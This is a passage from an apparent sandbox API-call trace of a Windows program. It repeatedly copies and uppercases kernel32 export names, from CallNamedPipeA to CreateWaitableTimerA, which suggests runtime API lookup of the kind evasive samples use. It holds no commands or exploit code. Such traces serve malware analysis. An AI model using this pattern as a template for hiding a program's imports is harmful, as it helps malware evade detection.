returned="CallNamedPipeA" [0082.955] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.955] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.955] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.955] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.955] lstrlenA (lpString="CANCELIO") returned 8 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.955] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.955] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.955] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.955] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.955] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.955] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.955] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.955] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.955] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.956] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.956] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.956] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.956] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.956] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.956] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.956] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.956] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.956] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.956] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.956] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.956] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.956] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.956] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.956] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.956] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.956] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.956] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.956] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.957] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.957] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.957] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.957] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.957] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.957] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.957] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.957] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.957] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.957] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.957] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.957] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.957] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.957] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.957] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.957] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.957] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.958] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.958] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.958] lstrlenA (lpString="COPYFILEA") returned 9 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.958] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.958] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.958] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.958] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.958] lstrlenA (lpString="COPYFILEW") returned 9 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.958] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.958] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.958] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.958] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.958] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.958] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.959] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.959] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.959] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.959] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.959] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.959] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.959] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.959] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.959] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.959] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.959] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.959] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.959] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.959] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.959] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.959] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.959] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.959] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.959] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.959] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.960] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.960] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.960] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.960] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.960] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.960] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.960] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.960] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.960] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.960] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.960] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.960] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.960] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.960] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.960] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.960] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.960] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.960] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.960] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.961] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.961] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.961] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.961] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.961] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.961] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.961] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.961] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.961] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.961] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.961] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.961] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.961] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.961] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.961] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.961] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.961] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.961] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.961] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.961] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.962] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.962] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.962] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.962] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.962] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.962] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.962] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.962] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.962] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.962] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.962] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.962] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.962] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.962] lstrcpyA (in: lpString1=0x3f2d468, 